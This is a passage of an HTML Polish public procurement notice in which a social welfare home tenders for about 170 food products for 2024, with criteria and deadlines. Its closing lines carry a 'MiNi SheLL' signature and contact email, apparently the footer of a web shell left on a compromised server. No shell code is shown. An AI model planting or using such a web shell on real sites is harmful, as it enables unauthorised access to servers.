Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Ananas puszka plastry 580 g	60 szt.<br/>2.	Baton bez glutenowy Raw 50 g	5 szt.<br/>3.	Baton owocowy bez cukry Raw 35 g	1200 szt.<br/>4.	Bazylia10 g	40 szt.<br/>5.	Beskidzkie mini krakersy 100 g	1700 szt.<br/>6.	Biszkopty 120 g	1300 szt.<br/>7.	Biszkopty b/cukru 100 g	150 szt.<br/>8.	Biszkopty bez glutenowe 85 g	5 szt.<br/>9.	Brzoskwinia w syropie puszka 850 g	10 szt.<br/>10.	Budyń bez cukru 1 kg różne smaki 50 kg<br/>11.	Bułka tarta 500 g	280 kg<br/>12.	Bułka tarta bez glutenowa 500 g np. Belviten	2 kg<br/>13.	Cebulka złocista 314 g	5 szt.<br/>14.	Chrupki kukurydziane 100 g typu Flips	400 szt.<br/>15.	Chrupki kukurydziane 70 g smakowe	700 szt.<br/>16.	Chrzan delikatesowy Mosso 290 g 740 szt.<br/>17.	Ciasteczka zbożowe b/cukru Sante 300 g – różne smaki	900 szt.<br/>18.	Ciastka korzenne lub miodowe lub pierniki toruńskie z polewą lub nadziewane	10 kg<br/>19.	Ciastka kruche z marmoladą, z polewą lukrowaną lub polewą czekoladową	10 kg<br/>20.	Ciastka maślane niskobiałkowe 150 g	5 szt.<br/>21.	Ciastka w polewie czekoladowej biszkoptowe lub herbatniki	10 kg<br/>22.	Ciecierzyca konserwowa 400 g	20 szt.<br/>23.	Cukier 1 kg	1700 kg<br/>24.	Cukier puder 500 g	16 kg<br/>25.	Cukier waniliowy ok. 30 g	330 szt.<br/>26.	Cynamon 20 g	70 szt.<br/>27.	Czosnek granulowany 1000 g	8 szt.<br/>28.	Czosnek marynowany 190 g	5 szt.<br/>29.	Ćwikła z chrzanem 290 g Laskol 640 szt.<br/>30.	Dżem bez cukru na fruktozie(dla diabetyków) 240 g 400 szt.<br/>31.	Dżem Łowicz 280 g truskawa, brzoskwinia, wisnia, porzeczka	500 szt.<br/>32.	Dżem owocowy na 1 osobę 25 g 600 szt.<br/>33.	Fasola biała 400 g drobna, średnia	60 kg<br/>34.	Fasola biała konserwowa 400 g	40 szt.<br/>35.	Fasola biała średnia, drobna op 5 kg	100 kg<br/>36.	Fasola czerwona konserwowa 400 g	160 szt.<br/>37.	Galaretka owocowa bez cukru 14 g	600 szt.<br/>38.	Galaretka owocowa różne smaki 75 g	1500 szt.<br/>39.	Gałka muszkatołowa mielona 10 g	20 szt.<br/>40.	Goździki 10 g	30 szt.<br/>41.	Groch połówki 400 g	40 kg<br/>42.	Groch połówki 5 kg	80 kg<br/>43.	Groszek konserwowy Kotlin 400 g	500 szt.<br/>44.	Grześki truskawkowe,śmietankowe 26 g bez polewy	750 szt.<br/>45.	Herbata czarna liściasta 100 g-Assam	1200 szt.<br/>46.	Herbata czarna liściasta 100 g Lipton	5 szt.<br/>47.	Herbata owocowa luzem dzika róza – malina 100 g	60 op.<br/>48.	Herbatniki 100 g typu Krakus, Szkolne	600 szt.<br/>49.	Herbatniki b/ cukru 120 g	150 szt.<br/>50.	Herbatniki Be-be 14 g	200 szt.<br/>51.	Imbir mielony 20 g	20 szt.<br/>52.	Kakao 100 g Wedel	100 szt.<br/>53.	Kasza gryczana 1 kg	40 kg<br/>54.	Kasza gryczana 5 kg	80 kg<br/>55.	Kasza jaglana	40 kg<br/>56.	Kasza jęczmienna 1 kg	50 kg<br/>57.	Kasza jęczmienna 5 kg	170 kg<br/>58.	Kasza kus- kus	170 kg<br/>59.	Kasza manna 1 kg	340 kg<br/>60.	Kasza pęczak 1 kg	60 kg<br/>61.	Kasza pęczak 5 kg	120 kg<br/>62.	Kaszka ryżowa bez mleczna, kleik bez cukru 160 g	30 szt.<br/>63.	Kawa Inka 150 g	900 szt.<br/>64.	Ketchup 480 g łagodny Pudliszki	560 szt.<br/>65.	Kisiel 1 kg bez cukru różne smaki	100 kg<br/>66.	Kminek mielony 20 g	10 szt.<br/>67.	Kolendra 6 g liść	10 szt.<br/>68.	Koncentrat barszcz czerwony Krakus 300 ml	110 szt.<br/>69.	Koncentrat pomidorowy 30% 200 g Dawton	10 szt.<br/>70.	Koncentrat pomidorowy 30% 900 g MK	250 szt.<br/>71.	Koncentrat żurek Krakus 300 ml	30 szt.<br/>72.	Kostki rosołowe 2,30 kg drobiowe	100 op.<br/>73.	Kostki rosołowe wołowe 2,30 kg	10 op.<br/>74.	Krem balsamiczny 250 g	2 szt.<br/>75.	Kukurydza konserwowa Dafton 400 g	400 szt.<br/>76.	Kurkuma 15 g	10 szt.<br/>77.	Kwasek cytrynowy 1000 g	20 szt.<br/>78.	Liść laurowy 80 g	60 szt.<br/>79.	Lu Petitki Lubisie różne 30 g	500 szt.<br/>80.	Majeranek 500 g	10 szt.<br/>81.	Majonez minimum 60% tłuszczu 900 ml Mosso	350 szt.<br/>82.	Makaron 0,4 kg Lubella 100 % pszenicy durum różny	200 kg<br/>83.	Makaron 5 kg pełnoziarnisty	100 kg<br/>84.	Makaron 5 kg 100 % przenicy durum różne	300 kg<br/>85.	Makaron bez glutenowy różny	1 kg<br/>86.	Marmolada wieloowocowa, tradycyjna 1000 g	1 kg<br/>87.	Masa kajmakowa 15 szt.<br/>88.	Masa makowa z bakaliami 800-1000 g	20 szt.<br/>89.	Mąka 1 kg typ 450 tortowa	1700 kg<br/>90.	Mąka bez glutenowa uniwersalna	2 kg<br/>91.	Mąka kukurydziana	2 kg<br/>92.	Mąka ryżowa	2 kg<br/>93.	Mąka ziemniaczana 1 kg	40 kg<br/>94.	Mieszanka czekoladowa- cukierki w polewie z zawartością 22% czekolady	5 kg<br/>95.	Mieszanka owocowa cukierki nadziewane	5 kg<br/>96.	Mini wafelki 150g b/cukru	700 szt.<br/>97.	Miód naturalny 1 kg	20 kg<br/>98.	Miód naturalny pszczeli na 1 osobę 25 g	2500 szt.<br/>99.	Morele suszone 200 g	10 szt.<br/>100.	Musztarda 175 g chrzanowa, miodowa, stołowa Roleski-łagodna	540 szt.<br/>101.	Musztarda łagodna Roleski 900 g	40 szt.<br/>102.	Ocet 10% spirytusowy 1 l	100 szt.<br/>103.	Ocet jabłkowy Kamis 250 g	2 szt.<br/>104.	Ogórek konserwowy w słoikach 1600 g	160 szt.<br/>105.	Ogórki konserwowy w słoikach 860 g	400 szt.<br/>106.	Olej rzepakowy 100% 1L- rafinowany	450 szt.<br/>107.	Olej rzepakowy 100% 3L- rafinowany	400 szt.<br/>108.	Oliwa z oliwek extra virgin 500 g	2 szt.<br/>109.	Oliwki czarne drylowane 210 g	10 szt.<br/>110.	Oliwki zielone drylowane 240 g	10 szt.<br/>111.	Oregano 8 g	30 szt.<br/>112.	Orzechy włoskie 100 g	20 szt.<br/>113.	Papryka konserwowa słoik 1500 g paski	210 szt.<br/>114.	Papryka ostra 800 g	2 szt.<br/>115.	Papryka słodka 800 g	6 szt.<br/>116.	Pasztet białostocki z drobiem 280 g	200 szt.<br/>117.	Pestki dyni 200 g	8 szt.<br/>118.	Pestki słonecznika 200 g	20 szt.<br/>119.	Pieczarki marynowana 800 g	7 szt.<br/>120.	Pieczywa chrupkie Sanko bez cukru 170 g-różne	100 szt.<br/>121.	Pieprz cytrynowy mielony 900 g	3 szt.<br/>122.	Pieprz naturalny mielony czarny 1000 g	8 szt.<br/>123.	Pieprz ziołowy 600 g	24 szt.<br/>124.	Płatki jęczmienne błyskawiczne 5 kg	240 kg<br/>125.	Płatki jęczmienne błyskawiczne 500 g	30 kg<br/>126.	Płatki kukurydziane bez glutenowe 500 g Nestle	5 szt.<br/>127.	Płatki migdałów 100 g	10 szt.<br/>128.	Płatki owsiane bez glutenowe 500 g	2 kg<br/>129.	Płatki owsiane zwykłe 5 kg	240 kg<br/>130.	Płatki owsiane zwykłe 500 g	40 kg<br/>131.	Płatki ryżowe 400 g	40 kg<br/>132.	Płatki ryżowe 5 kg	210 kg<br/>133.	Pomidorki krojone bez skórki- puszka 400 g	10 szt.<br/>134.	Pomidory suszone w oleju krojone słoik 270 g	10 szt.<br/>135.	Proszek do pieczenia 30 g	50 szt.<br/>136.	Przyprawa curry 20 g	100 szt.<br/>137.	Przyprawa do flaków 20 g	60 szt.<br/>138.	Przyprawa sucha Kucharek 1 kg 180 kg<br/>139.	Przyprawa w płynie 1 L Winiary	90 szt.<br/>140.	Rodzynki 200 g	40 kg<br/>141.	Ryż biały długoziarnisty 1 kg	70 kg<br/>142.	Ryż biały długoziarnisty 5 kg	270 kg<br/>143.	Słodzik dla diabetyków 1200 tabletek	50 szt.<br/>144.	Soczek owocowy bez cukru 200 ml	1700 szt.<br/>145.	Soczek warzywny pomidorowy bez cukru 330 g	700 szt.<br/>146.	Soczek warzywny z buraka 330 g bez cukru	700 szt.<br/>147.	Soczewica czerwona 5 kg	140 kg<br/>148.	Soda oczyszczona do celów spożywczych 100 g	10 szt.<br/>149.	Sok owocowo- warzywny b/ cukru 1 litr	140 szt.<br/>150.	Sok owocowy różne smaki b/cukru – 5 litrów	140 szt.<br/>151.	Sok owocowy różne smaki b/ cukru – 1 litr	100 szt.<br/>152.	Sok pomidorowy 1 litr	200 szt.<br/>153.	Sok wielo warzywny b/cukru 1 litr	300 szt.<br/>154.	Sos ogrodowy Knorr 700 g	5 szt.<br/>155.	Sos tatarski Mosso 240 g	300 szt.<br/>156.	Sól 1 kg różna	550 kg<br/>157.	Syrop owocowy 420 ml Paola, Gellwe, Łowicz – porzeczka, wiśnia, malina, truskawka	800 szt.<br/>158. Szczaw konserwowy siekany 900 g Laskol, Rolnik	100 szt.<br/>159.	Szynka wieprzowa konserwowa -konserwa 110 g	200 szt.<br/>160.	Śliwka kalifornijska 200 g	70 szt.<br/>161.	Śliwka w czekoladzie	5 kg<br/>162. Tortilla 18 cm-18 szt w op.	10 op.<br/>163.	Tymianek 10 g	30 szt.<br/>164.	Wafle b/cukru 180 g	100 szt.<br/>165.	Wafle ryżowe130 g typu Sonko	500 szt.<br/>166.	Wafle śmietankowe, orzechowe, o smaku chałwy, z nadzieniem owocowym lub kisielu	10 kg<br/>167.	Wiórki kokosowe 200 g	8 szt.<br/>168	Ziele angielskie 600 g	15 szt.<br/>169.	Zioła prowansalskie 10 g	80 szt.<br/>170.	Żelatyna spożywcza zwykła wp. 50 g	170 szt.<br/>171.	Żurawina suszona 200 g	10 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-01 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Dom Pomocy Społecznej, ul. Świerkowa 9</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-01 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com